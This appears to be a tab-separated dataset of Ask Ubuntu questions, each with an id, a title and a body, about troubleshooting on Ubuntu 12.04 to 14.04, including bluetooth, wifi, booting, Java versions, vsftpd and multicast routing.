501747	bluetooth issue on ubuntu 14.04	i 'm trying to use the built-in bluetooth on my lenovo x140e but even though i 'm able to turn it on , it never locates any devices i try to pair with it . i 've tried with a dualshock controller and my android phone , but no luck . the most common error i get when seeing the terminal output is `` d-bus setup failed : name already in use , '' but i 'm not sure what that means or how to fix it , or if it 's even the root of the problem . matberron @ thinkpad : ~ $ sudo bluetoothd -d -n [ sudo ] password for matberron : bluetoothd [ 7278 ] : bluetooth daemon 4.101 bluetoothd [ 7278 ] : src/main.c : parse_config ( ) parsing main.conf bluetoothd [ 7278 ] : src/main.c : parse_config ( ) discovto=0 bluetoothd [ 7278 ] : src/main.c : parse_config ( ) pairto=0 bluetoothd [ 7278 ] : src/main.c : parse_config ( ) pageto=8192 bluetoothd [ 7278 ] : src/main.c : parse_config ( ) auto_to=60 bluetoothd [ 7278 ] : src/main.c : parse_config ( ) name= % h- % d bluetoothd [ 7278 ] : src/main.c : parse_config ( ) class=0x000100 bluetoothd [ 7278 ] : src/main.c : parse_config ( ) key file does not have key 'deviceid' d-bus setup failed : name already in use bluetoothd [ 7278 ] : unable to get on d-bus any advice would be appreciated , and let me know if you need any other info on my end . thank you !
501750	x server in ubuntu	what is x-server software in ubuntu , i want to install oracle 12c dbms software but before installing i need to start x-server software , can anybody tell any easier way to install the software .
501753	deluge autoadd plugin is n't working for me	i 'm running ubuntu server and i have deluge installed . when i try to enable the autoadd plugin from the webui nothing happens . does anybody know why this happens any help is appreciated . thank you
501754	what is a short cut i can use to switch applications ?	in mac os it was command+tab . it is one of the most helpful tools , and i was wondering what was it 's ubuntu equivalent ?
501759	how do i change my java version ?	i want to install oracle jdk on my ubuntu 14.04 . i tried using webupd8 's method . the installer worked fine but the when i type java -version i get : java version `` 1.7.0_55 '' openjdk runtime environment ( icedtea 2.4.7 ) ( 7u55-2.4.7-1ubuntu1 ) openjdk 64-bit server vm ( build 24.51-b03 , mixed mode ) i even did sudo update-alternatives -- config java and tried changing the java that i use to oracle 's java but when i run java -version i still get the same icedtea version . how do i switch the java that i use to oracle 's version ?
501760	boot to ubuntu if specific usb is inserted	i have a windows desktop machine that i share with my wife . i 've been using ubuntu for some time on my laptop but the motherboard died so i 'm stuck with the desktop pc . i 'd like to dual boot the machine but with one condition . only show the bootloader menu if a usb is inserted . if a usb is not inserted then it should boot into windows . i know it can happen since i read it some years ago but i ca n't seem to find the article . i imagine that i have to install grub to the usb drive ? how can i do this ? thanx for any advice !
501761	wifi not working asus x550ca	the wifi on my asus x550ca laptop is not working . ethernet works fine in ubuntu but wifi does not work . wifi works just fine when i boot up windows 8.1 though . is there any special driver i have to install ?
501764	making vlcstreamer work with ipad ( non-free-codecs alternative )	i 'm trying to run movies on my ipad through wi-fi streaming . i already have got server program running , i got appropriate app on ipad , they see each other , but ipad ca n't start any movie in various formats . it seams like codec problem . i was reading that vlcstreamer need non-free-codecs , but medibuntu ppa are no longer available . is there any solution for streaming video to ipad , or alternative for non-free-codecs ?
501767	guide for users who 've never heard of linux ( and are 8 years old ) ?	my wife 's cousins had a useless computer because their mother loaded it with so many viruses it could n't run . i got tired of cleaning it up and just put lubuntu 14.04 on it . i installed libre office and put nice big shortcuts on the desktop so hopefully they can do homework and use the internet . i can not stay to answer all the questions they may have , and i would like to leave some resource they can use to learn how to use it better . they are not computer literate , and the smartest one is only 8 , but i want to at least give them a chance . is there a decent reference for absolute beginners to get introduced to linux , specifically lubuntu ? maybe i should just figure out how to remote desktop my way in ...
501772	is bumblebee still relevant for ubuntu 14.04 and up ?	i 've seen some posts announcing native nvidia optimus support since 14.04 . but i 've also found many tutorials of how to install and run bumblebee on this very same distribution . so my question is ... is bumblebee still required in order to properly use and alternate between my laptop 's discrete and dedicated graphics cards or i should expect them to work as intended out-of-the-box ? what exactly do they mean by `` native support '' ?
501773	wifi adapter can see ap , but can not connect	my wifi card is : network controller : atheros communications inc. ar928x wireless network adapter ( pci-express ) ( rev 01 ) my problem is that when i attempt to connect to a wifi network it refuses the connection and requests i input the correct password . i have reset the router , confirmed the password , and checked for possible configuration issues on that end but everything is normal and all other devices are functional in regards to wifi . edit : pastebin of wireless-info script results - http : //pastebin.com/aa8t2rn4
501778	disabling changing of desktop background	i currently have ubuntu 14.04 running . i have an admin account and a regular standard account . i 'm trying to make it so that the standard user can not change the desktop background . i 'm not sure where to begin or how to do this . any help greatly appreciated ! thanks ! update : for those who are also having problems with this . i found a solution online where it will cause the background to change back to whatever you set it to be : in startup applications add a new command : gsettings set org.gnome.desktop.background picture uri âfile : ///usr/share/backgrounds/ubuntu_1.jpgâ
501780	dual booting problem	i have lenovo z510 laptop and i installed windows 8.1 on uefi and ubuntu 14.04 on legacy mode . so , i suffer from dual booting problem . please , i want to manually choose between them at start up .
501790	kubuntu install partition assignment slider missing	thank you so much for reading this . i have ubuntu installed on my machine , but recently had a problem and it no longer boots . so , i wanted to take this op and upgrade to kubuntu . problem is , when i run the livecd and kubuntu is installing , the guided partition assignment shows 100 % space allocating to kubuntu and windows gone . there is suppose to be a slider to adjust the allocation , but there is n't . and i do want to keep windows . also i do n't get any message about uninstalling a previous version . should i try to uninstall first ? i was thinking this as just an upgrade . thank you , larry .
501791	toasted install , migrating users/data to 2nd install ?	my ubuntu 13 install went flaky after behaving well for quite a while . i tried upgrading to ubuntu 14 , and ended up in either the `` black screen on boot '' state ( fix by ctrl-alt-f1 for a terminal , then killall xorg ) ; or the infinitely-repeating login screen ; or the won't-boot-at-all situation , variously -- suggestions from the web moved the problem around , but did n't fix it . i found that my entire home directory ( -r ) was now owned by user 1008 , group 1009 ( no names for them ) . chown helped ( especially due to things like .xauthority and .config ) , but did n't fully fix things . i tried reinstalling ubuntu 14 from dvd on top ( twice ) , and it died saying that some of the previously installed packages could n't install , and i might have to install them manually ( did n't say which ones , and if that was logged somewhere it did n't say where ) . when i could get on at all , my monitor came up at 640x480 , and the displays control panel thought it was a built-in monitor ( it 's a quite new tower , not a laptop ) , that it was the only monitor and only resolution available . lshw produces one line , quickly overwritten by another that then sat , so it 's hard to determine what display it thinks it has . switching to alternative nvidia drivers did n't help any . so i reinstalled again , but `` side-by-side '' this time , to a different partition . that install seems to work fine , which brings me to the current question : the new install has nothing from the old one . sooooo , how do i get things moved across ? or can i replace the old ubuntu and get that partition back to working somehow ( remember installing over it from an ubuntu live dvd did n't work ) . among the things needed : * mounts so the other drives are even visible . there are icons for them in the launcher bar and the places pane of desktop filesystem views , but nothing appears to be in them , and getting properties shows a rapidly-growing number of files , and the message `` ( some content unreadable ) '' . it seems to think they 're local shared network volume ( what the ? ? ? ? ) . * a load of svn and git directories * a load of perl , python , and other libraries * paths , profiles , code , data , and all the other usual ~ stuff * setups for ufw , dyndns , samba shares , etc . the wacked-out permissions from the previous re-install have me worried about what other permissions i 'll have to fix if i try something as naive as cp -r from the old ~ to the new ... . i looked around for any tools for this , and was surprised not to find any . there has to be some reasonable way to do this ... . thanks ! -s
501795	hwe update for 12.04 , now programs do n't run -- fixes ?	i recently updated the kernel on 12.04 to a version that is going to be supported until 2017 . problem is , flightgear and celestia do n't run now , but i believe it 's vitally important to run a supported os ( tell me if i 'm wrong about this -- using the internet , and bank website is very important ) . i am wondering if people know any fixes for this situation ? thanks , anthony
501796	how to use a sources list generator	i 've been trying to install packages using terminal but i keep getting errors and it turns out my sources.list file is really messed up . so i found this webstite that generates a sources.list file for you i know my country and my release but i have no idea what other boxes are supposed to be ticked or not because i do n't know what they mean . my overall goal is just to have an up-to-date version of ubuntu that is able to have player , stage and ros installed on it .
501797	what is wrong with my ~./profile ?	i 'm pretty new to linux . i have been trying to install ant , java , and the android sdk . in the process have been messing with my ~/.profile and also with my /etc/.profile ( dangerous , i know ) . well i did something wrong and restarted my computer and when i would try to login , it would kick me back to the login screen . i eventually used a tty to rename my ~/.profile and made a new ~/.profile where i just deleted the last part of the profile . here is the original file that messed me up which i renamed .profile.copy : # ~/.profile : executed by the command interpreter for login shells . # this file is not read by bash ( 1 ) , if ~/.bash_profile or ~/.bash_login # exists . # see /usr/share/doc/bash/examples/startup-files for examples . # the files are located in the bash-doc package . # the default umask is set in /etc/profile ; for setting the umask # for ssh logins , install and configure the libpam-umask package . # umask 022 # if running bash if [ -n `` $ bash_version '' ] ; then # include .bashrc if it exists if [ -f `` $ home/.bashrc '' ] ; then . `` $ home/.bashrc '' fi fi # set path so it includes user 's private bin if it exists if [ -d `` $ home/bin '' ] ; then path= '' $ home/bin : $ path '' fi export path= '' $ path : $ home/.rvm/bin '' # add rvm to path for scripting path= '' $ path : ~/adt/sdk/tools : ~/adt/sdk/platform-tools '' ant_home=/home/computeruser/ path= $ { path } : $ { home } /bin path= $ { path } : $ { ant_home } /bin path= '' $ +path : /usr/lib/jvm/java-7-openjdk-amd64/bin : ~/adt/sdk/ : /usr/bin/ant '' path= '' $ +path : /usr/bin : /bin : /home/computeruser : /home/computeruser/apache-ant-1.9.4 : /home/computeruser/apache-ant-1.9.4/bin : /home/computeruser/adt/sdk/tools : /home/computeruser/adt/sdk/platform-tools '' in the ~/.profile that actually works now , i just deleted the line export path= '' $ path : $ home/.rvm/bin '' # add rvm to path for scripting and all the lines below it . now ant command and sdk command do n't work , of course . if i add the lines back in though , i will break my computer again . when i was originally changing my ~/.profile , i did n't figure out for a while that you had to restart your computer for the changes to the ~/.profile to take effect ( or at least sometimes you have to ? ) . that is why there is repeating similar lines . i do n't quite even understand what i 'm doing when it comes to changing environment variables , and any help understanding what i can and ca n't add back into my ~/.profile would be ever so much appreciated . here 's my /etc/.profile in case there 's something here broke too : # /etc/profile : system-wide .profile file for the bourne shell ( sh ( 1 ) ) # and bourne compatible shells ( bash ( 1 ) , ksh ( 1 ) , ash ( 1 ) , ... ) . if [ `` $ ps1 '' ] ; then if [ `` $ bash '' ] & & [ `` $ bash '' ! = `` /bin/sh '' ] ; then # the file bash.bashrc already sets the default ps1 . # ps1='\h : \w\ $ ' if [ -f /etc/bash.bashrc ] ; then . /etc/bash.bashrc fi else if [ `` `id -u` '' -eq 0 ] ; then ps1= ' # ' else ps1= ' $ ' fi fi fi # the default umask is now handled by pam_umask . # see pam_umask ( 8 ) and /etc/login.defs . if [ -d /etc/profile.d ] ; then for i in /etc/profile.d/*.sh ; do if [ -r $ i ] ; then . $ i fi done unset i fi thanks in advance to any help understanding what 's going on in these files and how i can get them working again without breaking my computer !
501799	changed part i on type , ca n't boot into my operating systems	changed partion type from `` logical '' to `` primary '' and now i get the grub rescue command line . i ca n't do anything with my computer at the moment so it would be appreciated for some help .
501800	can not open 2 usb cameras simultaneously on vlc player ubuntu 12.04	can not open 2 usb cameras simultaneously on vlc player ubuntu 12.04 how i open a camera : in terminal ( text after the $ prompt = commands that i type ) : $ ls /dev/video* /dev/video0 /dev/video1 $ vlc v4l2 : ///dev/video0 vlc media player 2.0.8 twoflower ( revision 2.0.8a-0-g68cf50b ) [ 0x9f2d908 ] main libvlc : running vlc with the default interface . use 'cvlc ' to use vlc without interface . now , vlc starts playing camera output . in another new terminal ( text after the $ prompt = commands that i type ) : $ vlc v4l2 : ///dev/video1 vlc media player 2.0.8 twoflower ( revision 2.0.8a-0-g68cf50b ) [ 0x9b24908 ] main libvlc : running vlc with the default interface . use 'cvlc ' to use vlc without interface . [ 0xb0500960 ] v4l2 demux error : vidioc_streamon failed libv4l2 : error setting pixformat : device or resource busy libv4l2 : error setting pixformat : device or resource busy libv4l2 : error setting pixformat : device or resource busy libv4l2 : error setting pixformat : device or resource busy libv4l2 : error setting pixformat : device or resource busy libv4l2 : error setting pixformat : device or resource busy libv4l2 : error setting pixformat : device or resource busy libv4l2 : error setting pixformat : device or resource busy libv4l2 : error setting pixformat : device or resource busy libv4l2 : error setting pixformat : device or resource busy [ 0xb0501188 ] v4l2 access error : can not set input 0 : device or resource busy [ 0xb0501188 ] v4l2 access error : can not set input 0 : device or resource busy [ 0xb5300618 ] main input error : open of `v4l2 : ///dev/video1 ' failed no video is played in this terminal 's vlc window . primary objective : i want to open two cameras simultaneously in opencv ( c++ ) ... got similar errors with opencv .. so i 'm using vlc player to debug the issue . the errors when opening two cameras simultaneously using c++ opencv ( the code is similar to https : //code.ros.org/trac/opencv/browser/trunk/opencv/samples/cpp/starter_video.cpp ? rev=4705 ) e557822 @ e557822-t740 : ~/desktop/camera/starter_video2 $ ls /dev/video* /dev/video0 /dev/video1 /dev/video2 e557822 @ e557822-t740 : ~/desktop/camera/starter_video2 $ ./starter_video2 0 1 vidioc_querymenu : invalid argument vidioc_querymenu : invalid argument vidioc_querymenu : invalid argument vidioc_querymenu : invalid argument vidioc_querymenu : invalid argument vidioc_querymenu : invalid argument vidioc_querymenu : invalid argument press space to save a picture . q or esc to quit init done opengl support available libv4l2 : error turning on stream : no space left on device vidioc_streamon : no space left on device
501806	how can i get ubuntu touch on a galaxy tab 2 7.0 p3113 ?	i have been trying to install ubuntu touch on my galaxy tab 2 7.0 p3113 for about 3 days now . i have tried many work arounds but i keep getting : info : phablet-flash : device detected as espressowifi error : phablet-flash : unsupported device , autodetect fails device vostro-420-series : ~ $ phablet-team/tools bash : phablet-team/tools : no such file or directory vostro-420-series : ~ $ phablet-team/tools/ bash : phablet-team/tools/ : no such file or directory can anyone help ?
501807	how to make a bootable backup of my 14.04 computer	i have ubuntu 14.04 running the gnome shell and i want to know how to make a full backup of my os and files and settings . i can not use remastersys and i have tried clonezilla but keep getting errors . if someone can give me a program , or tutorial on how to do this on 14.04 i would be gracious .
501811	intellij bad font rendering	i 've recently installed intellij on my ubuntu system and realized that the font i want to normally use monaco does n't render properly in intellij . so , the problem was slightly fixed from this post however the editor would still not render properly with monaco ; this is currently the state of my ide :
501812	how do i provide arguments to a command run from gksudo ?	i want to add a shortcut for gnome-system-monitor that runs with root access and has very high priority . my command for the shortcut is : gksudo -k -u root nice -- 20 gnome-system-monitor but this gives the error : gksudo : unrecognized option ' -- 20' how can i say that the -- 20 is an option of nice , not gksudo ? is this the best command for what i want ?
501823	teradata bteq on ubuntu	i am trying to set up a cron job server utilizing bteq to run our daily builds . i installed pretty much everything i could find on the td developers site via alien as the packages are rpm , but i didnt see anything bteq .
501824	failure to boot after botched ubuntu gnome install	specs lenovo g410 intel i5 8 gb ram 120gb crucial m500 ssd situation i 've been running ubuntu 14.04 for a couple of weeks with gnome 3 manually installed . after having a lot of problems with crashing gnome-panels and theming gnome 3 , i decided to just give it all up and go for a clean install of ubuntu gnome . i got a live cd and began the ubuntu gnome installer , but halfway through the installation an error was detected and the installer aborted . i 'm now unable to boot to any operation system , and i 've noticed that when i try to access bios settings , it takes up to 5 minutes to load rather than the 5-10 seconds that i am accustomed to on this system . when i try to boot up into a new ubuntu gnome live cd ( i burned another one after the installer failed ) , the following happens : i attempt to run a live session ( or to start the installer ) of ubuntu gnome and watch as the system appears to boot up ( gray background with gnome foot and 3 dot loading indicator ) and then fails after an hour . at this point a command line comes up and reads ( initramfs ) unable to find a medium containing a live file system if i try to boot the computer normally , it hangs at the `` lenovo '' screen for a few minutes ( before the installer botch it would only display this for a fraction of a second ) , and then after a long sit at a black screen will display error : failure reading sector 0x0 from cd0 and take me to a grub2 command line . what in the world do i need to do to get this computer up and running again ?
501825	ubuntu iso install error	i boot from my pny 8gb usb , which has the ubuntu iso image burned onto it . it shows the initiation screen , then the loading screen . after that , it shows an error on the second to last line . here is the error page . i ca n't figure out what 's wrong . i tried using usb 3.0 on boot , burning on a cd -r and booting , and still have n't fixed it .
501826	vsftpd not starting bug- apt-get-purge error	i successfully installed , configured , and used vsftpd . but after restart something became corrupted , now : ~ # service vsftpd status : ~ # service vsftpd start : ~ # service vsftpd restart : ~ # service vsftpd stop : ~ # netstat -an | grep :21 ( all return no error , and no info message ) : ~ # chkconfig -- list | grep ftp returns : atftpd 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off vsftpd 0 : off 1 : off 2 : on 3 : on 4 : on 5 : on 6 : off /var/log/vsftpd.log.1 - contains : fri jul 18 12:15:14 2014 [ pid 2 ] connect : client `` 192.168.0.2 '' fri jul 18 12:15:14 2014 [ pid 1 ] [ ftp ] ok login : client `` 192.168.0.2 '' , anon password `` mozilla @ example.com '' /var/log/vsftpd.log is empty dmseg log has no entry containing vsftpd ... here is my etc/vsftpd.conf file : # standalone listen=yes anonymous_enable=no local_enable=yes write_enable=yes dirmessage_enable=yes use_localtime=yes xferlog_enable=yes connect_from_port_20=yes ftpd_banner=welcome to blah ftp service . secure_chroot_dir=/var/run/vsftpd/empty pam_service_name=vsftpd rsa_cert_file=/etc/ssl/private/vsftpd.pem setup ftp ( vsftpd is not running ) - reccomends purging vsftpd ... .but there i have another problem ... ... this is the same problem i am having purging vsftp : ~ # apt-get purge vsftpd produces the error : removing vsftpd ... update-inetd : -- disable requires only one argument dpkg : error processing vsftpd ( -- remove ) : subprocess installed post-removal script returned error exit status 1 errors were encountered while processing : vsftpd e : sub-process /usr/bin/dpkg returned an error code ( 1 ) is the only work-around for the vsftp `` not-starting bug '' a complete purge and reinstall/reconfigure ? what is the simplest work-around for the common vsftp purge completion problem ? does anyone care to share another more reliable ftp program/daemon that is easy to configure and safe like vsftp ? but lacking the functional bugs vsftp has ... proftp ?
501827	gui login failure after deleting ecryptfs	ubuntu 12.04 : i run my os on a 64 gb ssd . so , space is important . thus , i too hastily deleted `` .ecryptfs '' to save 10gb . ( ecryptfs was not set up to encrypt my home folder or the disk itself ; so i do not know why it was steadily building up . i did not use it at all . ) all seemed fine but when i next booted the system , my password was not accepted at my gui login . i can log in from a command line , but can not get to the gui . startx does not work . the files `` .xauthority '' and `` .xauthoritybak '' are gone . i can log in as the other user on the system but can not get to my own files or access my files on my backup hds ( 4 tb in total ) due to permission problems . is there a way for me to restore my gui login or must i re-install the system ? `` .xauthority ''
501828	wifi super slow after 14.04 update on toshiba satalite m-55	i updated my toshiba satalite m-55 laptop with lubuntu 14.04 but after update i have super slow or no wifi . this is what i have when i type $ iwconfig : iwconfig wlan0 ieee 802.11bg essid : '' gogetter '' mode : managed frequency:2.462 ghz access point : 00:25:9c : d9 : fc:74 bit rate=11 mb/s tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=70/70 signal level=-38 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:3 invalid misc:169 missed beacon:0 lo no wireless extensions . eth0 no wireless extensions . but lspci sees this : lspci 00:00.0 host bridge : advanced micro devices , inc. [ amd/ati ] rc410 host bridge ( rev 01 ) 00:01.0 pci bridge : advanced micro devices , inc. [ amd/ati ] rc4xx/rs4xx pci bridge [ int gfx ] 00:04.0 pci bridge : advanced micro devices , inc. [ amd/ati ] rc4xx/rs4xx pci express port 1 00:13.0 usb controller : advanced micro devices , inc. [ amd/ati ] ixp sb4x0 usb host controller ( rev 80 ) 00:13.1 usb controller : advanced micro devices , inc. [ amd/ati ] ixp sb4x0 usb host controller ( rev 80 ) 00:13.2 usb controller : advanced micro devices , inc. [ amd/ati ] ixp sb4x0 usb2 host controller ( rev 80 ) 00:14.0 smbus : advanced micro devices , inc. [ amd/ati ] ixp sb4x0 smbus controller ( rev 81 ) 00:14.1 ide interface : advanced micro devices , inc. [ amd/ati ] ixp sb4x0 ide controller ( rev 80 ) 00:14.3 isa bridge : advanced micro devices , inc. [ amd/ati ] ixp sb4x0 pci-isa bridge ( rev 80 ) 00:14.4 pci bridge : advanced micro devices , inc. [ amd/ati ] ixp sb4x0 pci-pci bridge ( rev 80 ) 00:14.5 multimedia audio controller : advanced micro devices , inc. [ amd/ati ] ixp sb400 ac'97 audio controller ( rev 80 ) 00:14.6 modem : advanced micro devices , inc. [ amd/ati ] ixp sb400 ac'97 modem controller ( rev 80 ) 01:05.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rc410m [ mobility radeon xpress 200m ] 04:02.0 ethernet controller : qualcomm atheros ar2413/ar2414 wireless network adapter [ ar5005g ( s ) 802.11bg ] ( rev 01 ) 04:04.0 cardbus bridge : ene technology inc cb1410 cardbus controller ( rev 01 ) 04:06.0 ethernet controller : realtek semiconductor co. , ltd. rtl-8100/8101l/8139 pci fast ethernet adapter ( rev 10 ) it was working fine with zubuntu 12.04 . can you please help ? thanks !
501831	downloaded 14.04 to a usb stick	how do you boot from windows usb stick without it trying to install distro . the only way i could get the stick to boot was use wubi icon then it tries to install and ends up saying i do n't have enough space . i 'm running windows xp and ubuntu 10.10
501834	trouble using ubuntu on netbook	i 'm using an old dell netbook with intel atom processor . i had the newest ubuntu working for awhile at first . then my account seemed to get corrupted because i could log in as a guest just fine but trying to log into the user account just left the system on the empty background screen . since then i 've reinstalled twice and now several things do n't work . at first the wireless worked fine , but now it says it does n't have a driver when booting up and i do n't know how to add the driver , or why it have worked in the past but not now . also when i try to search for anything in the main search tool it will show files and folders i have but fails to find any internal programs like browser , text editor or calculator . i do n't know how to access any of these without the search functionality , except the browser is pinned to the taskbar so i can access that ( just ca n't search for it ? ? ) . at this point all i can do is look at pdfs i downloaded ( off of wired ethernet ) but i 'd like to be able to edit simple text files and browse on wifi as well . can anyone explain how to fix these issues or how reinstalling could have left me with less functionality than the original installation ?
501835	ca n't install libgtk2.0-0 : i386 on fresh 14.10 64bit install	i 'm trying to get the latest dwarf fortress release to run on a fresh 64bit 14.04 install . the follow is my console output . jeff @ mbp : ~ $ sudo apt-get install libgtk2.0-dev : i386 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libgtk2.0-dev : i386 : depends : libgtk2.0-0 : i386 ( = 2.24.23-0ubuntu1.1 ) but it is not going to be installed depends : gir1.2-gtk-2.0 : i386 ( = 2.24.23-0ubuntu1.1 ) but it is not going to be installed depends : libglib2.0-dev : i386 ( > = 2.27.3 ) but it is not going to be installed depends : libgdk-pixbuf2.0-dev : i386 ( > = 2.21.0 ) but it is not going to be installed depends : libpango1.0-dev : i386 ( > = 1.20 ) but it is not going to be installed depends : libatk1.0-dev : i386 ( > = 1.29.2 ) but it is not going to be installed depends : libcairo2-dev : i386 ( > = 1.6.4-6.1 ) but it is not going to be installed recommends : python : i386 ( > = 2.4 ) but it is not going to beinstalled recommends : debhelper : i386 e : unable to correct problems , you have held broken packages . any help would be greatly appreciated , thanks . update not install the -dev package makes no difference : jeff @ mbp : ~ $ sudo apt-get install libgtk2.0-0 : i386 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : account-plugin-facebook : depends : libaccount-plugin-generic-oauth but it is not going to be installed or ubuntu-system-settings-online-accounts but it is not going to be installed libgtk2.0-0 : i386 : depends : libatk1.0-0 : i386 ( > = 1.32.0 ) but it is not going to be installed depends : libgdk-pixbuf2.0-0 : i386 ( > = 2.22.0 ) but it is not going to be installed depends : libglib2.0-0 : i386 ( > = 2.37.3 ) but it is not going to be installed depends : libpango-1.0-0 : i386 ( > = 1.28.3 ) but it is not going to be installed depends : libpangocairo-1.0-0 : i386 ( > = 1.28.3 ) but it is not going to be installed depends : libpangoft2-1.0-0 : i386 ( > = 1.28.3 ) but it is not going to be installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages .
501837	guest additions seemingly uninstalls every time i use `` software updater '' in ubuntu studio	the latest ubuntu studio is amazing and comes with all the software i need to make graphics for my 2d games . however , every time i execute the `` software updater '' ( the one with the orange sync icon ) , ubuntu studio seems to to `` break '' and become a pain to use . i am using virtual box to run the guest os , and the problem seems to happen for lubuntu in my other laptop which is the alienware m11x . i am currently using ubuntu studio 64-bit installed on my virtual box which is installed on my asus g73jh-a1 laptop . everytime the software updater notifies me of an update , i would accept the installation , but there are always side effects which will be listed next : virtual box / ubuntu studio does not scale intelligently in `` scaled window mode '' . i understand the meaning of `` scaled '' but with guest additions , the os usually fixes the screen so that the screen is not stretched ( rather pixels are added to fill up the unused pixels ) . i like this feature because i do n't have to use xrandr which i can never ( no matter how many help threads i read ) get to become permanent because it would break my os and i would have to reinstall the os which takes at least 2 hours or make os backups every time . what is wrong with vertical window scrolling ? every time i use the software updater and restart the system , the page scrolling breaks . no matter what windows has the keyboard/input focus , the mouse scroll would scroll through the desktop screens instead of the in focus folder-manager or web browser , or any other in-focus application . i also lose host-to-guest drag and drop which i use a lot , and i 'm pretty sure i lose all the other features that require guest additions to work . so every time i install software updates through the gui app , the guest additions break . i have to reinstall the guest addition every time to get these fixes back . i have a feeling i am going in circles . why does the guest additions fix these annoyances ? why does n't the standard os fix the scroll bug ? it does n't make sense because a bug fix should not be an add-on . honestly , why is it so hard to get things to be permanent . xrandr requires writing a dangerous config file to make the resolution permanent . guest additions also do n't seem to permanent either . i use these instructions to install the guest additions and they work every time .
501840	ubuntu 14.04 used too much processor after latest updatest	after updating ubuntu 14.04 it uses 25-50 % of my processor continuously causing my laptop turnoff automatically by overheating . i have no problem before the updates . graphic driver is not a problem , i installed proprietary driver successfully . my processor is i5 for laptop so i believe i should not having a problem . the main cause of overheating my laptop is ubuntu latest update . please help us resolve this . thanks .
501841	after installation and restart , no os is found and i only have a grub	i purchased a new toshiba laptop pre loaded with windows 8 and i tried to replace the win8 with ubuntu . after a successful install with ubuntu , i restart the computer and it loads the usb again automatically . when i press escape i get sent to the grub terminal and i have no idea how to boot up ubuntu . when i try and reinstall it does detect ubuntu installed . my machine is a toshiba satellite c55-b5202 if that helps . thanks anyone who knows how to fix this , i have been literally trying for 8 hours now . thanks again and cheers !
501842	add multicast ip address into kernel route table	i want to add an ip ( multicast 228.0.0.4 ) in the range of 224.0.0.0 â 239.255.255.255 in the kernel routes table , so i used sudo route -nv add -net 228.0.0.4 -interface eth0 but it gives me : root @ macavity : /home/gaiz # route -nv add -net 228.0.0.4 -interface eth0 route : invalid option -- 'i' route : invalid option -- 't' route : invalid option -- 'r' route : invalid option -- 'f' route : invalid option -- 'a' route : invalid option -- 'c' usage : route [ -nnvee ] [ -fc ] [ < af > ] list kernel routing tables route [ -v ] [ -fc ] { add|del|flush } ... modify routing table for af . route { -h| -- help } [ < af > ] detailed usage syntax for specified af . route { -v| -- version } display version/author and exit . -v , -- verbose be verbose -n , -- numeric do n't resolve names -e , -- extend display other/more information -f , -- fib display forwarding information base ( default ) -c , -- cache display routing cache instead of fib < af > =use '-a < af > ' or ' -- < af > ' ; default : inet list of possible address families ( which support routing ) : inet ( darpa internet ) inet6 ( ipv6 ) ax25 ( ampr ax.25 ) netrom ( ampr net/rom ) ipx ( novell ipx ) ddp ( appletalk ddp ) x25 ( ccitt x.25 ) my route table : root @ macavity : /home/gaiz # netstat -r kernel ip routing table destination gateway genmask flags mss window irtt iface default dsldevice.lan 0.0.0.0 ug 0 0 0 wlan0 192.168.1.0 * 255.255.255.0 u 0 0 0 wlan0 and my current network configuration information root @ macavity : /home/gaiz # ifconfig -a eth0 link encap : ethernet hwaddr 24 : b6 : fd:4a:15 : ca inet6 addr : fe80 : :26b6 : fdff : fe4a:15ca/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:268 errors:0 dropped:0 overruns:0 frame:0 tx packets:107 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:16136 ( 16.1 kb ) tx bytes:15102 ( 15.1 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:2444 errors:0 dropped:0 overruns:0 frame:0 tx packets:2444 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:393755 ( 393.7 kb ) tx bytes:393755 ( 393.7 kb ) wlan0 link encap : ethernet hwaddr e0:06 : e6:79:60:49 inet addr:192.168.1.64 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :e206 : e6ff : fe79:6049/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:92082 errors:0 dropped:0 overruns:0 frame:0 tx packets:63686 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:112279263 ( 112.2 mb ) tx bytes:8760358 ( 8.7 mb )
501845	can the wacom tablets be used to write chinese character	well i am rather new to linux and my family would like to use it as well but they would want to use a wacom tablet to write instead . with my past experience with linux many basic programs that would work with windows didnt really work on linux . in order to write in chinese with the wacom tablet i must install a chinese package from wacom but i do not know if it will work . will the package in fact work with linux ?
501847	repairing corrupt gpt backup table on usb drive	i have spent way too much time trying to do this , consulting quite a few threads , trying everything i can . at this point there is n't anything i have n't tried . i 've been using both gdisk and gparted to try and repair this 128gb usb key . ca n't seem to do anything about the corrupt backup gpt table . gparted says `` primary seems ok so that will be used '' . i 'm stuck at the moment .
501849	bettery life issue with ubuntu 14.04 lts amd 64 bit	i have dell 5537 i5 4th gen laptop . after installation of ubuntu 14.04 lts amd 64 bit version on my laptop . my laptop battery life is decreasing very quickly .and life bet-try is showing 1 hours max . while using windows 7 / 8 , its working fine and battery life is 5-4 hours max . so , i want to use latest ubuntu but the battery life issue is very serious . please send me step by step for solving this issue with latest ubuntu . or you can send me the us phone number or your personal us number , so i will call you and you will help me on the spot if possible .
501853	i have upgraded my system from 12.04 to 14.04 after restart when im tried to login authenication error came	i have upgraded my system from 12.04 to 14.04 . after restart , when i tried to login , an authentication error came . after that , i used sudo apt-get install -f and rebooted the system . i did n't get any logon screen and system settings are not working . i also tried sudo apt-get install ubuntu-desktop , it shows some packages are broken . please help me with this issue .
501855	the ubuntu that i install hang version 14.04	anyone help i went into few problem using ubuntu os crashes how to fix it ? laptop information laptop : acer m5-481tg ultrabook dual graphic use after sometime it freezes
